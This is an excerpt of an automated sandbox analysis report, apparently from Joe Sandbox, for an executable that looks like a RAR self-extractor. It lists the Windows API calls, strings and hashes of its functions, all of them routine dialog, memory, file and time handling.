                  • Instruction Fuzzy Hash: 5631A0329007099FEB209A78DC45B5673E9FF00362F10C429EE8AE7551DF35AC49EB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetWindow.USER32(?,00000005), ref: 00F4CD51
                  • GetClassNameW.USER32(00000000,?,00000800), ref: 00F4CD7D
                    • Part of subcall function 00F417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F3BB05,00000000,.exe,?,?,00000800,?,?,00F485DF,?), ref: 00F417C2
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00F4CD99
                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00F4CDB0
                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00F4CDC4
                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00F4CDED
                  • DeleteObject.GDI32(00000000), ref: 00F4CDF4
                  • GetWindow.USER32(00000000,00000002), ref: 00F4CDFD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                  • String ID: STATIC
                  • API String ID: 3820355801-1882779555
                  • Opcode ID: 7461cd08855b2af306c2372095d6026ed79b0a43afbdccc4396ac72b459b8041
                  • Instruction ID: aff9dc75d5c95d52238becf8db2c5b0babc73542855e58c44bf2818eab438f03
                  • Opcode Fuzzy Hash: 7461cd08855b2af306c2372095d6026ed79b0a43afbdccc4396ac72b459b8041
                  • Instruction Fuzzy Hash: D0113A32E463147BE3716B309C4AFAF3E6CFF40B60F004121FE42A20A2DB648915B6E0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F58EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 00F58EC5
                    • Part of subcall function 00F584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958), ref: 00F584F4
                    • Part of subcall function 00F584DE: GetLastError.KERNEL32(00F63958,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958,00F63958), ref: 00F58506
                  • _free.LIBCMT ref: 00F58ED1
                  • _free.LIBCMT ref: 00F58EDC
                  • _free.LIBCMT ref: 00F58EE7
                  • _free.LIBCMT ref: 00F58EF2
                  • _free.LIBCMT ref: 00F58EFD
                  • _free.LIBCMT ref: 00F58F08
                  • _free.LIBCMT ref: 00F58F13
                  • _free.LIBCMT ref: 00F58F1E
                  • _free.LIBCMT ref: 00F58F2C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: e5d4f180ef9b1045b72c0dbef9cd4339138904984c43b0c73db921fe8bda2d80
                  • Instruction ID: 450541e0250b85dd63912674ccc4a338d632d2f59f803f9aaa84076abe8290ba
                  • Opcode Fuzzy Hash: e5d4f180ef9b1045b72c0dbef9cd4339138904984c43b0c73db921fe8bda2d80
                  • Instruction Fuzzy Hash: 1211D47650110DAFCB11EF94CC42CDA3BB5FF04391B0181A0BE49AB622DA36DA56AB80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F32162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID: ;%u$x%u$xc%u
                  • API String ID: 0-2277559157
                  • Opcode ID: 1d4f6327c91aea7603a6b50168e4a3085d4c64a8b0052fb1b238c60c8b4044e1
                  • Instruction ID: af738ae31776e3c285d0444163f01795372fec0af48edff4fa61f4ad9138ef6d
                  • Opcode Fuzzy Hash: 1d4f6327c91aea7603a6b50168e4a3085d4c64a8b0052fb1b238c60c8b4044e1
                  • Instruction Fuzzy Hash: 0FF14871A042405BDB65EF388C96BEE77957F90330F080569FD859B283DA28D948E7A2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00F3130B: GetDlgItem.USER32(00000000,00003021), ref: 00F3134F
                    • Part of subcall function 00F3130B: SetWindowTextW.USER32(00000000,00F635B4), ref: 00F31365
                  • EndDialog.USER32(?,00000001), ref: 00F4AD20
                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 00F4AD47
                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00F4AD60
                  • SetWindowTextW.USER32(?,?), ref: 00F4AD71
                  • GetDlgItem.USER32(?,00000065), ref: 00F4AD7A
                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00F4AD8E
                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00F4ADA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: MessageSend$Item$TextWindow$Dialog
                  • String ID: LICENSEDLG
                  • API String ID: 3214253823-2177901306
                  • Opcode ID: fe0fbf1b0d897dea073e780fe06330e880da7ea069d8c4c73002961790e3167b
                  • Instruction ID: 68b896d5b1d62dff3c727d1a2eeadf283d24ac619dcc487d4e7b27b0fa32f4ef
                  • Opcode Fuzzy Hash: fe0fbf1b0d897dea073e780fe06330e880da7ea069d8c4c73002961790e3167b
                  • Instruction Fuzzy Hash: DC21A332E84109BBD2216F25ED49F7B3F7CFB4AB56F010015FA05A24A0DB669941F772
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F39443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00F39448
                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00F3946B
                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00F3948A
                    • Part of subcall function 00F417AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F3BB05,00000000,.exe,?,?,00000800,?,?,00F485DF,?), ref: 00F417C2
                  • _swprintf.LIBCMT ref: 00F39526
                    • Part of subcall function 00F3400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F3401D
                  • MoveFileW.KERNEL32(?,?), ref: 00F39595
                  • MoveFileW.KERNEL32(?,?), ref: 00F395D5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                  • String ID: rtmp%d
                  • API String ID: 2111052971-3303766350
                  • Opcode ID: a4a2c068ba329752f7a485ca3af8986400a06d4562f04e2efc1c67de01cbd44a
                  • Instruction ID: d130cd6d5a6e443f5c1337c95a067e75c0d926e141fd6fc8aee253df43d137b1
                  • Opcode Fuzzy Hash: a4a2c068ba329752f7a485ca3af8986400a06d4562f04e2efc1c67de01cbd44a
                  • Instruction Fuzzy Hash: 7B415171D0525976DF30EB608C85ADA777CAF513A0F0444E5B549E3142EBF89B88EB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F40A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
                  Download Yara Rule
                  APIs
                  • __aulldiv.LIBCMT ref: 00F40A9D
                    • Part of subcall function 00F3ACF5: GetVersionExW.KERNEL32(?), ref: 00F3AD1A
                  • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00F40AC0
                  • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00F40AD2
                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00F40AE3
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F40AF3
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F40B03
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F40B3D
                  • __aullrem.LIBCMT ref: 00F40BCB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                  • String ID:
                  • API String ID: 1247370737-0
                  • Opcode ID: 080acbb9344fd2e4e6e07636b988c9724dd0384c4451d280361862d2c5d0684b
                  • Instruction ID: 8040d42fa62d20d0b15745851c4255a32fee7564ee68e75b113cc4aab28b4765
                  • Opcode Fuzzy Hash: 080acbb9344fd2e4e6e07636b988c9724dd0384c4451d280361862d2c5d0684b
                  • Instruction Fuzzy Hash: 91411AB1408305AFC710DF65C88496BFBF8FB88714F004A2EFA96D2650E779E549DB52
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                  Download Yara Rule
                  APIs
                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00F5F5A2,?,00000000,?,00000000,00000000), ref: 00F5EE6F
                  • __fassign.LIBCMT ref: 00F5EEEA
                  • __fassign.LIBCMT ref: 00F5EF05
                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00F5EF2B
                  • WriteFile.KERNEL32(?,?,00000000,00F5F5A2,00000000,?,?,?,?,?,?,?,?,?,00F5F5A2,?), ref: 00F5EF4A
                  • WriteFile.KERNEL32(?,?,00000001,00F5F5A2,00000000,?,?,?,?,?,?,?,?,?,00F5F5A2,?), ref: 00F5EF83
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                  • String ID:
                  • API String ID: 1324828854-0
                  • Opcode ID: e645b86b36f42386956cca003810c8d5c1de303e5646a1710d01d1ad189c2fe2
                  • Instruction ID: d8ff914fad7c9414fdabe403ddea77382931ce070c2faf7d4062d06d6053002d
                  • Opcode Fuzzy Hash: e645b86b36f42386956cca003810c8d5c1de303e5646a1710d01d1ad189c2fe2
                  • Instruction Fuzzy Hash: C95108B1E00209AFCB14CFA8DC45AEEBBF9FF09311F14411AEA55E7291DB709A45DB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                  Download Yara Rule
                  APIs
                  • GetTempPathW.KERNEL32(00000800,?), ref: 00F4C54A
                  • _swprintf.LIBCMT ref: 00F4C57E
                    • Part of subcall function 00F3400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F3401D
                  • SetDlgItemTextW.USER32(?,00000066,00F7946A), ref: 00F4C59E
                  • _wcschr.LIBVCRUNTIME ref: 00F4C5D1
                  • EndDialog.USER32(?,00000001), ref: 00F4C6B2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                  • String ID: %s%s%u
                  • API String ID: 2892007947-1360425832
                  • Opcode ID: edd16b02b7c0e8601117fa08a9b6bd3430c08747579a2b456fc3926c345c14e6
                  • Instruction ID: a4711904a6d9153d0a46ba90fba1e31a6c49e6d3c572109bffa7a144c4caa67f
                  • Opcode Fuzzy Hash: edd16b02b7c0e8601117fa08a9b6bd3430c08747579a2b456fc3926c345c14e6
                  • Instruction Fuzzy Hash: 6141C472D0061CAADB25DFA0CC45EDA7BBDEB08315F0090A6E90DE6060E7759BC4EB91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F48E62 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00F48F38
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00F48F59
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: AllocByteCharGlobalMultiWide
                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                  • API String ID: 3286310052-4209811716
                  • Opcode ID: 1e454a3289f27adacecfe05ff355b6e7c014d542b900b1bf860f7abfde6a571d
                  • Instruction ID: 4222b61530bebf26a44cd211ca2e2a595844996e958cb6d4d6d8c4797cfe33ea
                  • Opcode Fuzzy Hash: 1e454a3289f27adacecfe05ff355b6e7c014d542b900b1bf860f7abfde6a571d
                  • Instruction Fuzzy Hash: 41310B319083167BD710BB649C02F6F7B989F417B1F140519FD11971C1EF68994EB3A6
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F49635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                  Download Yara Rule
                  APIs
                  • ShowWindow.USER32(?,00000000), ref: 00F4964E
                  • GetWindowRect.USER32(?,00000000), ref: 00F49693
                  • ShowWindow.USER32(?,00000005,00000000), ref: 00F4972A
                  • SetWindowTextW.USER32(?,00000000), ref: 00F49732
                  • ShowWindow.USER32(00000000,00000005), ref: 00F49748
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: Window$Show$RectText
                  • String ID: RarHtmlClassName
                  • API String ID: 3937224194-1658105358
                  • Opcode ID: a5a9585f0d86d33ca0dbe9d1ccff98c7bb83ef76e576b3d80efa102e5ac13703
                  • Instruction ID: 068839aa808fc628531ba8a3ba040f607b970aa097a4e6343289d070eef12d8e
                  • Opcode Fuzzy Hash: a5a9585f0d86d33ca0dbe9d1ccff98c7bb83ef76e576b3d80efa102e5ac13703
                  • Instruction Fuzzy Hash: EF31E032508204AFDB519F64DC48F2B7FA8EF48321F01455AFE499A162CB74D894EBA5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F5BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00F5BF79: _free.LIBCMT ref: 00F5BFA2
                  • _free.LIBCMT ref: 00F5C003
                    • Part of subcall function 00F584DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958), ref: 00F584F4
                    • Part of subcall function 00F584DE: GetLastError.KERNEL32(00F63958,?,00F5BFA7,00F63958,00000000,00F63958,00000000,?,00F5BFCE,00F63958,00000007,00F63958,?,00F5C3CB,00F63958,00F63958), ref: 00F58506
                  • _free.LIBCMT ref: 00F5C00E
                  • _free.LIBCMT ref: 00F5C019
                  • _free.LIBCMT ref: 00F5C06D
                  • _free.LIBCMT ref: 00F5C078
                  • _free.LIBCMT ref: 00F5C083
                  • _free.LIBCMT ref: 00F5C08E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                  • Instruction ID: ef4aee2f6458175b6ef317351f09ef7bdd40415fc678cc085a71cd20a4d9f787
                  • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                  • Instruction Fuzzy Hash: A6112E75541B04FAD620BBB0CC06FCBB7DD6F00702F408815BB9A66852DB79F90DAA90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F520CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,?,00F520C1,00F4FB12), ref: 00F520D8
                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F520E6
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F520FF
                  • SetLastError.KERNEL32(00000000,?,00F520C1,00F4FB12), ref: 00F52151
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID: ErrorLastValue___vcrt_
                  • String ID:
                  • API String ID: 3852720340-0
                  • Opcode ID: a4a67376037dcc82f63e6e37836b1cc3b2715d91c5f3c70daa382fdd9901b79a
                  • Instruction ID: cb9ee826e8647117de190a27504cb0e9f39c1b2db1e1d1d25312d2a53ba48d0d
                  • Opcode Fuzzy Hash: a4a67376037dcc82f63e6e37836b1cc3b2715d91c5f3c70daa382fdd9901b79a
                  • Instruction Fuzzy Hash: D201283761AB156EE6952BB4BC8551B3A44EB227B77210729FF20950F0FF924C0D7154
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F4DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                  • Associated: 00000000.00000002.1991841515.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991877861.0000000000F63000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F74000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991893159.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1991938181.0000000000F92000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_f30000_hx1hwVZIjy.jbxd
                  Similarity
                  • API ID:
                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                  • API String ID: 0-1718035505
                  • Opcode ID: 4379b4cbf74f148df318b43e091975b9019b750c92767148e5fd91addba521ec
                  • Instruction ID: 27eebdf952cbcb0e23f4bebf297cd2cdb4e51a919ac46c9ce418b75de16abd8f
                  • Opcode Fuzzy Hash: 4379b4cbf74f148df318b43e091975b9019b750c92767148e5fd91addba521ec
                  • Instruction Fuzzy Hash: D301CD71F416226F4F215F745CD56A63BA89A41776320027FEE01E7340DEA1C849F690
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00F40CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                  Download Yara Rule
                  APIs
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F40D0D
                    • Part of subcall function 00F3ACF5: GetVersionExW.KERNEL32(?), ref: 00F3AD1A
                  • LocalFileTimeToFileTime.KERNEL32(?,00F40CB8), ref: 00F40D31
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F40D47
                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00F40D56
                  • SystemTimeToFileTime.KERNEL32(?,00F40CB8), ref: 00F40D64
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F40D72
                  Memory Dump Source
                  • Source File: 00000000.00000002.1991853500.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
